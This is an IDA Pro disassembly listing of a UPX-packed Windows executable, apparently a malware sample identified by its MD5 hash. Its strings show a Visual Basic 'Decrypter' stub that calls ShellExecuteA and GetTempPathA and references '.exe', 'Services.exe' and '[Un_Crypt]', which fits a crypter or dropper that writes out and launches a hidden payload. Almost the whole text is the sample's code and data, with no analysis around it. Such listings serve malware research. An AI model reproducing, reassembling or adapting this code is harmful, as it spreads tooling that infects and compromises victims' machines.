;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : B9A121540AABEB96D94A54358516CA73
; File Name : u:\work\b9a121540aabeb96d94a54358516ca73_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_401000 dd 734FC6E3h, 7350A683h, 7350A5FBh, 7343B278h, 73444B1Fh
; DATA XREF: UPX0:00401052�r
; UPX0:00401064�r ...
dd 73518EEBh, 73519AD4h, 735054F3h, 7351E05Dh, 73508F58h
dword_401028 dd 7342DE12h ; DATA XREF: sub_401082�r
dword_40102C dd 734446B5h, 4 dup(0) ; DATA XREF: UPX0:00401046�r
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401040 proc near ; CODE XREF: UPX0:00401665�p
; UPX0:004016BD�p
; DATA XREF: ...
jmp dword_401000+0Ch
sub_401040 endp
; ---------------------------------------------------------------------------
jmp dword_40102C
; ---------------------------------------------------------------------------
jmp dword_401000+24h
; ---------------------------------------------------------------------------
jmp dword_401000
; ---------------------------------------------------------------------------
jmp dword_401000+14h
; ---------------------------------------------------------------------------
jmp dword_401000+8
; ---------------------------------------------------------------------------
jmp dword_401000+4
; ---------------------------------------------------------------------------
jmp dword_401000+1Ch
; ---------------------------------------------------------------------------
jmp dword_401000+18h
; ---------------------------------------------------------------------------
jmp dword_401000+10h
; ---------------------------------------------------------------------------
loc_40107C: ; DATA XREF: UPX0:00401235�o
jmp dword_401000+20h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401082 proc near ; CODE XREF: UPX0:0040108D�p
jmp dword_401028
sub_401082 endp
; ---------------------------------------------------------------------------
loc_401088: ; CODE XREF: UPX1:00406934�j
push offset dword_4010F0
call sub_401082
; ---------------------------------------------------------------------------
dw 0
align 8
dd 30h, 40h, 0
dd 555666ECh, 4C192EFFh, 3142EC8Ch, 0B3550A26h, 0
dd 10000h, 48430000h, 72435241h, 72636564h, 65747079h
dd 20200072h, 20202020h, 0
dword_4010D8 dd 6, 4017C8h, 7, 401690h, 7, 401638h ; DATA XREF: UPX0:00401534�o
dword_4010F0 dd 21354256h, 2A2636h, 3 dup(0) ; DATA XREF: UPX0:loc_401088�o
dd 7Eh, 2 dup(0)
dd 0A0000h, 409h, 0
dd offset loc_401230
dd offset dword_401300
dd 30F000h, 0FFFFFF00h, 8, 1, 0
dd 0E9h, 2 dup(4010D8h), 401094h, 78h, 82h, 8Ch, 8Dh, 4 dup(0)
aDecrypter db 'Decrypter',0
aDecrypter_0 db 'Decrypter',0
dword_40117C dd 63656400h, 74707972h, 7265h, 1, 40153Ch, 0 ; DATA XREF: UPX0:off_401590�o
; UPX0:off_4021DC�o ...
dd 2 dup(0FFFFFFFFh), 0
dd offset off_401590
dd offset dword_403000
dd 4, 401214h, 200015h, 0
dd 1F2CE4h, 4011C0h, 4016A8h, 401046h, 403368h, 40172Ch
dd 401718h, 40173Ch, 401750h, 401758h, 40104Ch, 401052h
dd 401224h, 401768h, 401788h, 401058h, 4012F4h, 40105Eh
dd 401064h, 40106Ah, 4017C4h, 4017B4h, 401650h, 690056h
dd 750073h, 401C24h, 4021DCh, 401C24BAh, 107CB900h, 0E1FF0040h
; ---------------------------------------------------------------------------
loc_401230: ; DATA XREF: UPX0:0040111C�o
mov edx, offset off_4021DC
mov ecx, offset loc_40107C
jmp ecx
; ---------------------------------------------------------------------------
dword_40123C dd 10001h, 40153Ch, 0 ; DATA XREF: UPX0:off_4015C0�o
; UPX0:00403308�o
dd 2 dup(0FFFFFFFFh), 0
dd offset off_4015C0
dd offset dword_403038
dd 1, 4012F0h, 20001Fh, 0
dd 1E4634h, 401274h, 401804h, 4017ECh, 401070h, 401850h
dd 401838h, 401884h, 4018CCh, 4018B4h, 401914h, 4018FCh
dd 401958h, 401940h, 401988h, 4017D4h, 4019C8h, 4019B0h
dd 401A08h, 4019F0h, 401A44h, 401A2Ch, 401A80h, 401A68h
dd 401AB8h, 401AA0h, 401AF0h, 401AD8h, 401B0Ch, 401B40h
dd 401B28h, 401B70h, 401B58h, 401E94h, 401E94BAh, 107CB900h
dd 0E1FF0040h
dword_401300 dd 1F4h, 40153Ch, 0 ; DATA XREF: UPX0:00401120�o
; UPX0:004032A4�o
dd offset aSsssUuuu ; "ééééÌÌÌÌÌÌÌÌÌÌÌÌžžžž"
dd offset aSsssUuuu+10h
dd 36Ch, 403000h, 401076h, 85h dup(0)
dd offset dword_4010D8
dword_401538 dd 3, 0 ; DATA XREF: UPX0:00401B90�o
; UPX0:00403064�o
dd offset dword_403058
dd offset dword_401B8C
dd 0FFFFFFFFh, 0
dd offset dword_403048
dd 75F9AA78h, 4A4C93EDh, 0D2AF6981h, 26130FACh, 2000Ah
dd 20002h, 401590h, 3 dup(0)
dd offset aDecrypter_1 ; "decrypter"
dd 409h, 408h, 0
dd 2
off_401590 dd offset dword_40117C+0Ch ; DATA XREF: UPX0:004011A0�o
dd 0FFFFFFFFh, 4016C4h, 0
dd offset dword_403008
align 8
dd offset aMainmod ; "MainMOD"
dd 4, 0
dd 0FFFFh, 18001h, 0
off_4015C0 dd offset dword_40123C ; DATA XREF: UPX0:00401254�o
dd 0FFFFFFFFh, 4017A4h, 0
dd offset dword_403040
align 8
dd offset aModspaceremove ; "modSpaceRemove"
dd 1, 0
dd 0FFFFh, 18001h, 0
aMainmod db 'MainMOD',0 ; DATA XREF: UPX0:004015A8�o
aModspaceremove db 'modSpaceRemove',0 ; DATA XREF: UPX0:004015D8�o
align 4
aDecrypter_1 db 'decrypter',0 ; DATA XREF: UPX0:0040157C�o
align 4
dd 0Ch, 6C656873h, 2E32336Ch, 6C6C64h, 0Eh, 6C656853h
dd 6578456Ch, 65747563h, 41h, 401618h, 401628h, 40000h
dd 403350h, 2 dup(0)
; ---------------------------------------------------------------------------
mov eax, dword_403358
or eax, eax
jz short loc_40165B
jmp eax
; ---------------------------------------------------------------------------
loc_40165B: ; CODE XREF: UPX0:00401657�j
push 401638h
mov eax, offset sub_401040
call eax ; sub_401040
jmp eax
; ---------------------------------------------------------------------------
align 4
dword_40166C dd 9, 6E72656Bh, 32336C65h, 0 ; DATA XREF: UPX0:off_401690�o
dword_40167C dd 0Dh, 54746547h, 50706D65h, 41687461h, 0 ; DATA XREF: UPX0:00401694�o
off_401690 dd offset dword_40166C+4 ; DATA XREF: UPX0:loc_4016B3�o
dd offset dword_40167C+4
dd 40000h, 40335Ch, 2 dup(0)
; ---------------------------------------------------------------------------
mov eax, dword_403364
or eax, eax
jz short loc_4016B3
jmp eax
; ---------------------------------------------------------------------------
loc_4016B3: ; CODE XREF: UPX0:004016AF�j
push offset off_401690
mov eax, offset sub_401040
call eax ; sub_401040
jmp eax
; ---------------------------------------------------------------------------
align 4
a60:
unicode 0, <60>,0
db 9,0
dd 0
dd 10000h, 10008h, 1000Ch, 10010h, 10014h, 1050018h, 0
dd 200001h, 240001h, 280001h, 1, 36414256h, 4C4C442Eh
dd 0
dword_401708 dd 0FCFB3D23h, 1068A0FAh, 838A7h, 0B571332Bh, 0FCFB3D22h
; DATA XREF: UPX0:004017C8�o
dd 1068A0FAh, 838A7h, 0B571332Bh, 0
dd 2, 401708h, 401718h, 0
dd 33AD4F79h, 11CF6699h, 0AA000CB7h, 93D36000h, 2, 5Ch
dd 8, 65002Eh, 650078h, 0
dd 18h, 650053h, 760072h, 630069h, 730065h, 65002Eh, 650078h
dd 0
dd 18h, 55005Bh, 44006Eh, 5F006Fh, 720043h, 700079h, 5D0074h
dd 0
dd 8000Ch, 2 dup(0)
dd 8, 70006Fh, 6E0065h, 3 dup(0)
dd offset dword_401708
dd offset dword_403368
dd 12h, 31005Bh, 730037h, 610070h, 650063h, 5Dh, 12h, 32005Bh
dd 730033h, 610070h, 650063h, 5Dh, 2Eh, 0Bh dup(200020h)
dd 20h, 12h, 32005Bh, 730031h, 610070h, 650063h, 5Dh, 2Ch
dd 0Bh dup(200020h), 0
dd 2Ah, 0Ah dup(200020h), 20h, 12h, 31005Bh, 730030h, 610070h
dd 650063h, 5Dh, 28h, 0Ah dup(200020h), 0
dd 12h, 31005Bh, 730039h, 610070h, 650063h, 5Dh, 26h, 9 dup(200020h)
dd 20h, 12h, 31005Bh, 730038h, 610070h, 650063h, 5Dh, 24h
dd 9 dup(200020h), 2 dup(0)
dd 22h, 8 dup(200020h), 20h, 12h, 31005Bh, 730036h, 610070h
dd 650063h, 5Dh, 20h, 8 dup(200020h), 0
dd 12h, 31005Bh, 730035h, 610070h, 650063h, 5Dh, 1Eh, 7 dup(200020h)
dd 20h, 12h, 31005Bh, 730034h, 610070h, 650063h, 5Dh, 1Ch
dd 7 dup(200020h), 0
dd 12h, 31005Bh, 730033h, 610070h, 650063h, 5Dh, 1Ah, 6 dup(200020h)
dd 20h, 12h, 31005Bh, 730032h, 610070h, 650063h, 5Dh, 18h
dd 6 dup(200020h), 0
dd 12h, 31005Bh, 730031h, 610070h, 650063h, 5Dh, 16h, 5 dup(200020h)
dd 20h, 14h, 5 dup(200020h), 0
dd 10h, 39005Bh, 700073h, 630061h, 5D0065h, 0
dd 12h, 4 dup(200020h), 20h, 10h, 38005Bh, 700073h, 630061h
dd 5D0065h, 0
dd 10h, 4 dup(200020h), 0
dword_401B84 dd 2 dup(0FFFFFFFFh) ; DATA XREF: UPX0:00401B9C�o
dword_401B8C dd 0 ; DATA XREF: UPX0:00401544�o
dd offset dword_401538+4
dd 0FFFFFFFFh, 0
dd offset dword_401B84
dd 3 dup(0)
dd 0FFFFFFFFh, 0
dd 4FF746Ch, 6C34FF60h, 0FFF5FF60h, 5E000000h, 80000h
dd 3CFF5871h, 4FF606Ch, 58FCFF5Ch, 6CFF5C6Ch, 47FF74h
dd 0FF586C00h, 0FF4869FDh, 0FF64F6FCh, 60000432h, 4FF5CFFh
dd 22FCFF64h, 43FF746Ch, 6004FF60h, 0FF484DFFh, 38044008h
dd 10AFFh, 606C000Ch, 0FF746CFFh, 4000047h, 3160FF38h
dd 602FFF78h, 0FF3835FFh, 730014h, 401188h, 440004h, 380070h
dd 0
dd 130000h, 0
dd 1Eh, 30001h, 1000000h, 1FF78h, 2FF64h, 4FF74h, 3B006Dh
dd 3A00FFh, 18h, 30000h, 0
dd 1FF60h, 1FF5Ch, 2FF38h, 0F5h, 0FFFFF500h, 1F5FFFFh
dd 1B000000h, 11B0000h, 108000h, 1800020Bh, 1027FD00h
dd 0F500h, 0FFF50000h, 0F5FFFFFFh, 1, 1B00031Bh, 10800004h
dd 20B00h, 27FD0018h, 0F50010h, 0F5000000h, 0FFFFFFFFh
dd 1F5h, 51B00h, 8000041Bh, 20B0010h, 0FD001800h, 0F5001027h
dd 0
dd 0FFFFFFF5h, 1F5FFh, 61B0000h, 71B00h, 0B001080h, 180002h
dd 1027FDh, 0F5h, 0FFFFF500h, 1F5FFFFh, 1B000000h, 91B0008h
dd 108000h, 1800020Bh, 1027FD00h, 0F500h, 0FFF50000h, 0F5FFFFFFh
dd 1, 1B000A1Bh, 1080000Bh, 20B00h, 27FD0018h, 0F50010h
dd 0F5000000h, 0FFFFFFFFh, 1F5h, 0C1B00h, 80000D1Bh, 20B0010h
dd 0FD001800h, 0F5001027h, 0
dd 0FFFFFFF5h, 1F5FFh, 0E1B0000h, 0F1B00h, 0B001080h, 180002h
dd 1027FDh, 0F5h, 0FFFFF500h, 1F5FFFFh, 1B000000h, 111B0010h
dd 108000h, 1800020Bh, 1027FD00h, 0F500h, 0FFF50000h, 0F5FFFFFFh
dd 1, 1B00121Bh, 10800013h, 20B00h, 27FD0018h, 0F50010h
dd 0F5000000h, 0FFFFFFFFh, 1F5h, 141B00h, 8000151Bh, 20B0010h
dd 0FD001800h, 0F5001027h, 0
dd 0FFFFFFF5h, 1F5FFh, 161B0000h, 171B00h, 0B001080h, 180002h
dd 1027FDh, 0F5h, 0FFFFF500h, 1F5FFFFh, 1B000000h, 191B0018h
dd 108000h, 1800020Bh, 1027FD00h, 0F500h, 0FFF50000h, 0F5FFFFFFh
dd 1, 1B001A1Bh, 10800007h, 20B00h, 27FD0018h, 0F50010h
dd 0F5000000h, 0FFFFFFFFh, 1F5h, 1B1B00h, 80001C1Bh, 20B0010h
dd 0FD001800h, 0F5001027h, 0
dd 0FFFFFFF5h, 1F5FFh, 1D1B0000h, 1E1B00h, 0B001080h, 180002h
dd 1027FDh, 46001080h, 0FDFF5Ch, 95FDFF6Ch, 6E0010h, 40123Ch
dd 20000Ch, 280220h, 0
dd 130000h, 0
dd 10h, 10000h, 1000000h, 2FF6Ch, 0Ch, 2 dup(0)
dd 4FF7404h, 205FF78h, 32400h, 400140Dh, 0FF780800h, 500500Dh
dd 0FF746C00h, 2A00061Bh, 4FF6823h, 7004FF6Ch, 205FFh
dd 0D000324h, 40014h, 0DFF7008h, 50058h, 2AFF6C6Ch, 1BFF6423h
dd 232A0007h, 1F4FF50h, 5DFEFFF4h, 0A320020h, 68FF7400h
dd 64FF6CFFh, 29FF50FFh, 0FF780004h, 1F4FF70h, 400085Eh
dd 0FF3C7100h, 3C6C01F4h, 0FF4004FFh, 0C00090Ah, 0FF400400h
dd 8E7FD60h, 35000000h, 1F4FF40h, 0A0B3DFDh, 23000000h
dd 0B1BFF74h, 6C232A00h, 0F402F4FFh, 205DFEFFh, 43200h
dd 0FF6CFF74h, 0F5h, 0FFFFF500h, 543AFFFFh, 4E000CFFh
dd 4004FF40h, 894FFh, 2C040000h, 0D0AFFh, 2C040014h, 836FFFFh
dd 0FF3C5920h, 18000807h, 3602FF00h, 0FF400004h, 2F5FF2Ch
dd 94000000h, 180008h, 40FF282Eh, 0AFF4004h, 8000Eh, 4FF282Dh
dd 2360FF40h, 2F5FF74h, 94000000h, 180008h, 0FF742F3Bh
dd 0F4FF4035h, 898FFh, 0F828001Ch, 40001FEh, 1F5FF18h
dd 94000000h, 180008h, 0FF08469Eh, 0FED868FEh, 4028029Eh
dd 40001FFh, 22FCFF18h, 2F5h, 89400h, 282E0018h, 544D40FFh
dd 44008FFh, 0F0AFF2Ch, 2D001000h, 2C04FF28h, 0E7FD60FFh
dd 0C0008h, 40000436h, 93FF2CFFh, 1C0008h, 1CC6FFF4h, 894019Dh
dd 0B000C00h, 40010h, 0FBAD02F4h, 8E7FDFDh, 0F4001000h
dd 89800h, 0B91E001Ch, 89401h, 100B000Ch, 0F4000400h, 0FDFBAD01h
dd 8E7FDh, 0FFF40010h, 1C000898h, 89400h, 33FC0010h, 0C8EBFFF4h
dd 9401F41Ch, 140008h, 0F5FF5446h, 0FFh, 0AFF4004h, 80011h
dd 0FBFF4004h, 60FF2CEFh, 8E7FDh, 4360014h, 2CFF4000h
dd 2951EFFh, 10000894h, 0F433FC00h, 1CC8EBFEh, 894022Fh
dd 46001400h, 0FEF5FF54h, 4000000h, 110AFF40h, 4000800h
dd 0EFFBFF40h, 0FD60FF2Ch, 140008E7h, 43600h, 0FF2CFF40h
dd 9402951Eh, 100008h, 0FDF433FCh, 6A1CC8EBh, 89402h, 54460014h
dd 0FDF5FFh, 40040000h, 110AFFh, 40040008h, 2CEFFBFFh
dd 0E7FD60FFh, 140008h, 40000436h, 1EFF2CFFh, 8940295h
dd 46001400h, 894FF54h, 50001000h, 0AFF4004h, 80011h, 0FBFF4004h
dd 60FF2CEFh, 8E7FDh, 4360014h, 2CFF4000h, 0FF1804FFh
dd 0FED87EFEh, 2F4013Ah, 14000807h, 0F500h, 77FC0000h
dd 3DFD02F4h, 0A0Bh, 0FEAC3100h, 0FCFEB804h, 0FB00F422h
dd 0FEB423FDh, 34FEB004h, 1BFEB06Ch, 50040012h, 506C34FFh
dd 0FEAC3EFFh, 1BFF7423h, 232A000Bh, 6404FF68h, 646C34FFh
dd 131BFFh, 34FF6C04h, 4FF6C6Ch, 22FCFEC8h, 1800140Ah
dd 10323C00h, 6CFF7400h, 64FF68FFh, 0B4FF50FFh, 0ACFEB0FEh
dd 14C8FCFEh
off_4021DC dd offset dword_40117C+0Ch ; DATA XREF: UPX0:loc_401230�o
dd 0D00004h, 380314h, 0
dd 130000h, 0
dd 20h, 50000h, 0
dd 2FEE8h, 2FED8h, 2FF18h, 2FEC8h, 2FEB8h, 40h, 0D0000h
dd 0
dd 6FF28h, 1FF74h, 1FF6Ch, 1FF68h, 1FF64h, 1FF50h, 1FEB4h
dd 1FEB0h, 1FEACh, 3FF78h, 3FF70h, 2FF40h, 2FF2Ch, 3 dup(0CCCCCCCCh)
aSsssUuuu db 'ééééÌÌÌÌÌÌÌÌÌÌÌÌžžžž',0 ; DATA XREF: UPX0:0040130C�o
align 4
dd 362h dup(0)
dword_403000 dd 14A0E8h, 0 ; DATA XREF: UPX0:004011A4�o
dword_403008 dd 0Ch dup(0) ; DATA XREF: UPX0:004015A0�o
dword_403038 dd 14A158h, 0 ; DATA XREF: UPX0:00401258�o
dword_403040 dd 2 dup(0) ; DATA XREF: UPX0:004015D0�o
dword_403048 dd 0 ; DATA XREF: UPX0:00401550�o
dd 1, 400000h, 0
dword_403058 dd 7343AB98h, 2 dup(0) ; DATA XREF: UPX0:00401540�o
; UPX0:004032C0�o
dd offset dword_401538+4
dd 84h dup(0)
dd 7343ABA8h, 2 dup(0)
dd offset off_4032A8
dd 7 dup(0)
dd offset dword_401300
off_4032A8 dd offset dword_4032B0 ; DATA XREF: UPX0:00403284�o
dd offset dword_4032F0
dword_4032B0 dd 7343ABC0h, 3 dup(0) ; DATA XREF: UPX0:off_4032A8�o
dd offset dword_403058
align 8
dd offset dword_40117C+0Ch
dd 7343ABD0h, 0
dd 0FFFFh, 7343AC30h, 5 dup(0)
dword_4032F0 dd 7343ABC0h, 2 dup(0) ; DATA XREF: UPX0:004032AC�o
dd 1, 403058h, 0
dd offset dword_40123C
dd 7343ABD0h, 0
dd 0FFFFh, 7343AC30h, 0Fh dup(0)
dword_403358 dd 0 ; DATA XREF: UPX0:00401650�r
dd 2 dup(0)
dword_403364 dd 0 ; DATA XREF: UPX0:004016A8�r
dword_403368 dd 726h dup(0) ; DATA XREF: UPX0:004017CC�o
dd 6Dh, 0
; ---------------------------------------------------------------------------
jmp fword ptr [ebp+2]
; ---------------------------------------------------------------------------
db 0FFh
dd 78FF0204h, 6C440102h, 6E75466Ch, 6F697463h, 6C61436Eh
dd 5F01006Ch, 6162765Fh, 65637845h, 61487470h, 656C646Eh
dd 0C7FF0072h, 2C8FF02h, 10260FFh, 636F7250h, 6C6C6143h
dd 69676E45h, 0FF00656Eh, 64FF023Ah, 269FF00h, 0
dd 455000h, 3014C00h, 713E2800h, 46h, 0
dd 0F00E000h, 6010B01h, 2 dup(200000h), 0
dd 108800h, 100000h, 300000h, 40000000h, 2 dup(100000h)
dd 400h, 100h, 400h, 0
dd 500000h, 100000h, 509200h, 200h, 10000000h, 100000h
dd 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 227400h, 2800h, 400000h, 23C00h, 10h dup(0)
dd 22000h, 2000h, 100000h, 3400h, 6 dup(0)
dd 65742E00h, 7478h, 131800h, 100000h, 200000h, 100000h
dd 3 dup(0)
dd 2000h, 61642E60h, 6174h, 36C00h, 300000h, 5 dup(0)
dd 4000h, 73722EC0h, 6372h, 23C00h, 400000h, 100000h, 300000h
dd 3 dup(0)
dd 4000h, 400040h, 22D000h, 5D000000h, 0D0000040h, 389h dup(0)
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00006000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 406000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_406000 dd 92A1FBA4h, 0C25FF00h, 2C054010h, 64646464h, 8140024h
; DATA XREF: UPX1:004067A1�o
dd 64646464h, 10181C04h, 6466DDB6h, 0F0682820h, 6301E804h
dd 6907FF7Eh, 0EC40304Eh, 0FF555666h, 8C4C192Eh, 9B5BFFECh
dd 263142FDh, 15B3550Ah, 4843002Bh, 72435241h, 0B6636564h
dd 72FF22F9h, 65747079h, 1D200072h, 4117C806h, 0DD939BFBh
dd 16900707h, 35425638h, 2A263621h, 0B09F60C3h, 0A0D7E09h
dd 83040900h, 0DD75D6D8h, 3138112h, 0FF8DF0h, 919A7508h
dd 0E9002FBBh, 4010D803h, 0A4017894h, 82271A69h, 765B8D8Ch
dd 0A344B259h, 57B80009h, 1D9D82FBh, 0FFF1153Ch, 13900B00h
dd 0ED7DD6B1h, 14920330h, 23E3158Fh, 0FDB743DBh, 1F2CE4h
dd 0A80F11C0h, 333F46D3h, 0A69B2C03h, 18179669h, 4C58503Ch
dd 0D75D3B10h, 3B24522Ch, 0F881768h, 0A6BAE9AEh, 64075EF4h
dd 37C46A03h, 9C3FED97h, 690023B4h, 75007300h, 21DC1C33h
dd 2DF87DECh, 7CB908BAh, 10BAE1ABh, 0C813340Bh, 0C001B316h
dd 4D20FD38h, 1FF001D3h, 1E4634h, 66CCEB74h, 18040FDBh
dd 1070EC6Fh, 0B303380Bh, 84AE9A6Ch, 14B4CC07h, 0D966FC19h
dd 40584D75h, 0D4078803h, 69AEC817h, 19B0CB96h, 44F01A08h
dd 0AF74032Ch, 68809A69h, 31BA0B8h, 9D34D3D8h, 3F1B0CDBh
dd 58702803h, 6E7B0792h, 4CF1E94h, 1F4C3h, 773B73AEh, 3272260h
dd 0BF0C036Ch, 71D2176h, 0D8006004h, 66180317h, 305820E3h
dd 5BFB8C57h, 48777FFFh, 0F9AA780Fh, 4C93ED75h, 0AF69814Ah
dd 130FACD2h, 0B01E00B2h, 102BD26h, 16086BCBh, 0B06ED940h
dd 26F0846h, 4B118803h, 0DCC6CEE9h, 30231BC4h, 43BF007h
dd 5FACF67h, 89800169h, 0A42F123Ch, 93906690h, 1F84017h
dd 7FFFF6Eh, 6E69614Dh, 444F4Dh, 53646F6Dh, 65636170h
dd 76096552h, 80A57765h, 3378AB4h, 0DB656873h, 6CFDBBA7h
dd 2E32336Ch, 0E000564h, 7845530Fh, 5EED7525h, 41236CD7h
dd 0A3289F18h, 1F335095h, 0D797BBF8h, 0B0C58A1h, 0FF0274C0h
dd 0B86F68E0h, 6BAEB740h, 0DD0664Fh, 6B03091Bh, 0FD656E61h
dd 5873EEF6h, 47030D2Bh, 82547465h, 74615070h, 9A419068h
dd 705756CDh, 48605C80h, 9064392Eh, 4DD74D36h, 0F5092DC6h
dd 100C0308h, 34DECEE9h, 5001814h, 3201901h, 0C1DF9F24h
dd 0B1B28A1h, 442E3641h, 3D234C4Ch, 0FF6FD908h, 0A0FAFCFBh
dd 38A71068h, 71332B3Dh, 0FF0F22B5h, 9F438105h, 796C6308h
dd 9933AD4Fh, 0F2D6EFBDh, 0B711CF66h, 93D33CAAh, 0DC235C1Fh
dd 3DF33E1h, 65002Eh, 3F180078h, 6BACA0Bh, 59765B16h, 1F730963h
dd 7EB7C1AEh, 55005Bh, 6F00D16Eh, 29D55F00h, 8502EC6Fh
dd 2B0979h, 510C1F5Dh, 66F75D18h, 70230900h, 0F74B6E39h
dd 175C19D8h, 314B1203h, 0F9633700h, 2536C5ECh, 17456D61h
dd 25330032h, 2E219AC2h, 32140120h, 314B9724h, 13B0A32Ch
dd 7B89002Fh, 7C90D840h, 472830DFh, 0C80C90C8h, 86263900h
dd 4314B2E4h, 877B2438h, 22004085h, 217B6F2Fh, 1B360819h
dd 3B2192F3h, 1E3F3508h, 0A5972433h, 1C1C343Bh, 77B02119h
dd 0B9211A7Bh, 3237912Ch, 9D956329h, 109F6F18h, 1690A5B2h
dd 94B3141Bh, 104FBE71h, 39296729h, 2F31601Bh, 0B4390938h
dd 613B1092h, 8B17B0F0h, 2F1B840Bh, 6C3FF6DFh, 0FF746C17h
dd 34FF6004h, 0FF5036Ch, 0EEFDAE5Eh, 5871155Fh, 4103CFFh
dd 58FCFF5Ch, 522046Ch, 47B9BDBEh, 69FD1428h, 64F61148h
dd 0BE4E32FFh, 1D6DB2DDh, 22641F5Ch, 4260431Ch, 0C0EE664Dh
dd 40081BDFh, 0AFF3804h, 81353D2Fh, 10EFB6DBh, 0FF783160h
dd 9350F2Fh, 33CEC514h, 493F5D7h, 0D3709Bh, 0ED6B0013h
dd 1373E24h, 92F0109h, 0AE06ED5Bh, 5B9A0140h, 0AEAB3B00h
dd 0C23679h, 1F00A73Ah, 235C6000h, 9AF9E07Bh, 0F5CDF538h
dd 21B86F5h, 9B0BBBB2h, 0B1D8007h, 27FD3202h, 89922010h
dd 4039964h, 59226505h, 807068Eh, 92265922h, 590B0A09h
dd 0C659226h, 260F0E0Dh, 10226592h, 61641211h, 14135922h
dd 48991549h, 17168996h, 89928E18h, 1B1A1964h, 0D9226590h
dd 1E1D1C20h, 9746C6B6h, 0FD1B460Bh, 0C6950381h, 0AD8B1A7h
dd 1D0CD36Eh, 0DB6F2802h, 3F129C7Bh, 22B0471h, 732E386Dh
dd 78040023h, 0EB710583h, 2414B1B8h, 0AE140D2Ch, 500D0D08h
dd 2A70DDB6h, 2AFD2CF8h, 6C1F6823h, 4CB3B522h, 587070C8h
dd 0CDAB7D18h, 26641FB6h, 11FF5007h, 5DFEFFF4h, 0B8E6B5ADh
dd 0CC0A327Dh, 14191B35h, 0B5B76EDDh, 704F2D29h, 38085E1Bh
dd 6C093C71h, 6E966771h, 3A400404h, 0FD600709h, 0EF17BAE7h
dd 40359A3Eh, 0B3DFD19h, 0B79520Ah, 0E964199Ah, 4026C52h
dd 0FB77DF0Eh, 543A1012h, 404E3DFFh, 43E9448h, 0B46DFF6Eh
dd 1444502Ch, 836FF07h, 7625920h, 0B6F2CD08h, 36EB2419h
dd 2CFF4039h, 9AD79402h, 2E127FBEh, 7E40FF28h, 0B2DFB0Eh
dd 97B5FC81h, 3B1F6FB9h, 0FF8C0D2Fh, 15B20898h, 28A30DE0h
dd 7601FEF8h, 856B011Fh, 469E1F6Fh, 0D8689208h, 25639EFEh
dd 30BD7B1Bh, 4D5D17D7h, 0D6901C54h, 0FA19F66h, 0E42C6278h
dd 0FBF08CB0h, 59930DEDh, 9D1CC660h, 0B169401h, 0EF6EC710h
dd 0ADEA1ACDh, 0C26FDFBh, 1E7B00F4h, 725B3BB9h, 9A011E60h
dd 0DBAC0B94h, 33FCF6FBh, 1CC8EB0Dh, 46FD29F4h, 0B60CD854h
dd 11DFDF33h, 7DEFFB07h, 0D8736414h, 2951E87h, 22FFE3Ah
dd 990819A4h, 2C6AFDFEh, 0FDB900B6h, 0A16422Ch, 2D506C89h
dd 1D7E6355h, 3A58DDE1h, 16070251h, 0A177FCF8h, 0DA307F0h
dd 0FEAC3121h, 78FEB804h, 0EDC0AD29h, 0B4231442h, 0D4FEB00Bh
dd 819B6803h, 5004E64Dh, 1F3E03DEh, 0C31D70EBh, 1364BE44h
dd 1B1D13A5h, 6C661D76h, 0A3AC8CCh, 323CAE14h, 8C6316B5h
dd 0AB685810h, 0F90B4348h, 0FC38BC09h, 0D0B714C8h, 0B5031400h
dd 20B191C2h, 0FEE80505h, 0B660A1F4h, 4F893266h, 0E1B8034Fh
dd 75672216h, 5A06F70Dh, 0B74D34D9h, 68036C20h, 0FEB45064h
dd 66992A5Bh, 5019ACB0h, 0C0660370h, 4340AEBAh, 0CC032Ch
dd 770240E9h, 9E0F60h, 4604453h, 20A1308h, 5540119h, 0FB728C9h
dd 5B6D7456h, 4FF026Dh, 0BF027802h, 1FFFD50h, 466C6C44h
dd 74636E75h, 436E6F69h, 5F01FD61h, 0CB62765Fh, 61FFFDB2h
dd 65637845h, 61487470h, 656C646Eh, 0C8C72D72h, 0BFF6CB60h
dd 6F72502Fh, 6E452663h, 656E6967h, 0FF643A18h, 56E0C72h
dd 50E80269h, 3014C45h, 713E2800h, 90FFA833h, 0F00E046h
dd 6010B01h, 3F2754B5h, 8800DD44h, 51093010h, 0BC27B37h
dd 99EE0403h, 7BD9B3Bh, 7921750h, 0C0DECB61h, 7100CBAh
dd 0DECA0006h, 2274DB20h, 303C2852h, 0B26FB200h, 6402B22Dh
dd 0EA82734h, 742E07EAh, 0A8747865h, 0D85B3F13h, 1298F510h
dd 61642E60h, 0CC003160h, 4B706174h, 5BBFB061h, 722EC0BAh
dd 637273h, 0BE2B40C3h, 272D90DFh, 22D00440h, 5D0Dh, 9E000h
dd 0FF000048h, 3 dup(0)
; ---------------------------------------------------------------------------
public start
start:
pusha
mov esi, offset dword_406000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_4067C2
; ---------------------------------------------------------------------------
align 8
loc_4067B8: ; CODE XREF: UPX1:loc_4067C9�j
mov al, [esi]
inc esi
mov [edi], al
